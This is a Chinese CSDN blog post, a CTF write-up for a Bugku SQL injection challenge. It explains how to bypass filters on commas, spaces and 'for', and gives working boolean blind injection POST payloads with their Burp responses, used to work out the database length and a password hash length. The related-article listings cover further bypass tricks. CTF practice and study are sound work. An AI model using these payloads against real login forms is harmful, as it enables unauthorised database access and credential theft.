bugku学习之43.sql注入2(只剩下from没过滤其余的全部过滤)

最新推荐文章于 2023-05-02 16:30:46 发布
VIP文章 最新推荐文章于 2023-05-02 16:30:46 发布
阅读量285 收藏
点赞数
分类专栏: safe - WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s11show_163/article/details/104686969
版权

考察:

  • 逗号被过滤:substr(from for)或者mid(from for)截断
  • for被过滤:不使用for则mid(from)默认截断到字符串位
  • 空格被过滤:不使用空格
  • admin字符串与另一个字符串比较时会被翻译成0或者空格
    所以’admin’-’‘的意思是减去空字符串,所以值为0,更深远的’admin’-0-’‘先减去0再减去空字符串,值也为0,而’admin’-1-’'的值则为1。
  • 此题为post注入已经具有首尾两个单引号于是只需要在输入框输入admin’-1-‘和admin’-0-'即可。由此1和0的位置可以替换为注入查询的字符串比如:
uname=admin'-(length('a')!=1)-'&passwd=1111

#Burp: <script> alert('password error!!@_@');parent.location.href='index.php'; </script>


 密码错误说明账号正确,a的长度就是1

 uname=admin'-(length(database())!=3)-'&passwd=1111

 #Burp:<script> alert('password error!!@_@');parent.location.href='index.php'; </script>

 database()长度就是3

 也可以用等于号则username error为真:
 uname=admin'-(length(database())=3)-'&passwd=111
#Burp: <script> alert('username error!!@_@');parent.location.href='index.php'; </script>
 database()长度就是3

 uname=admin'-(length(passwd)=32)-'&passwd=111
#Burp: <script> alert('username error!!@_@');parent.location.href='index.php'; </script>
 passwd密码是32位推测是MD5的32加密码

 uname=admin'-(length(passwd)!=32)-'
最低0.47元/天 解锁文章
s11show_163
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习
sql注入常见绕过方法
最新发布
ljlrookiebird的博客
09-05 2911
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他总结到了,小伙伴可以留言补充
[极客大挑战 2019]BabySQL
pakho_C的博客
01-10 784
web 第七题 [极客大挑战 2019]BabySQL 打开靶场 根据提示,作者很可能对输入进行了过滤 仍旧先尝试永真式进行登陆 根据报错提示,or应该是被过滤掉了 那么就要想到绕过过滤的方法 参考:SQL注入 绕过and和or过滤 这里可以使用双写加大小写OorR或者使用 || 进行绕过 得到admin账号和密码,与我做的第五题web第五题一样,密码解密不出来,什么用 既然有报错,那么肯定存在sql注入,尝试常规的注入手段 猜解字段数 看来or 和by 都被过滤了 参考了一下大佬的文章:SQ
Mysql基础(6)函数
TylerGuoj的博客
06-15 404
函数 mysql的函数类似java中的方法,封装了若干实现细节,提高多个sql语句的复用性。 函数使用select作为调用关键字,基本语法为select 函数名(实参列表) from 表名,其中实参列表中的字段来源于数据表,当函数有参数时,from字句可省略。其可以分为 单行函数 操作行。 只作用在某一行数据,实现某种功能。譬如length()用于计算字符串长度、concat()用于拼接字符串。 mysql引擎会遍历表中的每一行数据,然后执行若干次(表行数)单行函数,最终结果仍是一个数据表。 分组
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7567
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1111
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
C# MVC 过滤器防止SQL注入
09-15
C# MVC 过滤器防止SQL注入
输入值/表单提交参数过滤有效防止sql注入的方法
10-26
输入值/表单提交参数过滤可以有效防止sql注入或非法攻击,下面为大家介绍些不错的方法,感兴趣的不要错过
JSP使用过滤器防止SQL注入的简单实现
01-08
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有...
sql注入过滤字典.txt
10-15
sql注入过滤字典.txt
SQL注入一些过滤及绕过总结
weixin_44300286的博客
07-20 1万+
前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结。 1、过滤关键字 过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。 绕过方法: (1)最常用的绕过方法就是用/**/,<>,分割关键字 sel<>ect sel/**/ect (2)根据过滤程度,有时候还可以用双写绕过 s...
sql注入绕过
qq_43613772的博客
03-19 402
1、大小写绕过 改变语句中单词的大小写即可,如:select=>SelEct 2、双写绕过 如下: ununionion seselectlect 3、内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 /!../ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行。 select * from users where id = -1 union /*!...
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
buuctf-BabySQL
m0_62094846的博客
11-11 333
可以看到or不见了,再联系网页中所说进行过滤,可能是过滤掉了一些注入语句的关键词,但是到底过滤了哪些是个问题 过滤掉了or 和by 用oorrder bbyy,就可以在系统过滤后得到order by 有3段数据 接下来查数据库 系统又过滤了union select from被过滤了,注意information的or也是被过滤的 接下来查表,先试试ctf where也被过滤了 后面查不出结果,到时候再试试 看wp,把字段放在密码后面 ...
SQL检索、过滤数据(一)
cuicui_ruirui的博客
05-27 597
1.1 select检索数据 1. select 列名 from 表名; 2. select 列名1,列名2,列名3 from 表名; 3. select * from 表名; 警告:使用通配符 一般而言,除非你确实需要表中的每一列,否则最好别使用*通配符。虽然使用通配符能让你自己省事,不用明确列出所需列,但检索不需 要的列通常会降低检索和应用程序的性能。 提示:检索未知列 使用通配符有一个大优点。由于不明确指定列名(因为星号检索每一列),所以能检索出名字未知的列。 提示:SQL...
[极客大挑战 2019]BabySQL(replace()的简单过滤
qq_45521281的博客
04-15 476
又是这个页面,一样的网站,就是加了过滤,试一下万能密码登陆: 用户名:1' or 1=1# 密码:123 具体报错如下:只保留了 1=1# ,这就说明被检测到了or,并把or给过滤了 看一看还过滤了什么玩意: 随便输入: 用户名:1' union select 1,2,3# 报错显示只保留了 1,2,3# ,这就说明被检测到了union 和 select,并把他们给过滤了 我们猜测后台的...
mysql中函数mid_MySQL MID()函数的用法详解(代码示例)
weixin_32702015的博客
01-18 744
在MySQL中,MID()函数返回从指定位置开始的子字符串。MID()和SUBSTR()都是SUBSTRING()的同义词。基本语法是这样的:MID(str,pos,len)这里,str是字符串,pos是起始子字符串的位置,len是一个可选参数,它决定从起始位置返回的字符数。这个函数有几种不同的使用方法,所以完整的语法看起来是这样的:MID(str,pos)MID(str FROM pos)MID...
SQL注入过滤限制绕过方法
weixin_30879169的博客
04-28 1211
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
SQL注入 -过滤绕过
技术小白
09-25 1万+
版权声明:本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 许可协议。转载自 https://blog.csdn.net/wy_97/article/details/78085664 写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这...
2.SQL注入防护方法?
04-30
SQL注入是一种常见的网络攻击方式,攻击者通过在用户输入的数据中注入恶意SQL代码,从而获得权限、窃取数据或者破坏系统。以下是一些常见的SQL注入防护方法: 1. 使用参数化查询:参数化查询可以有效地防止SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值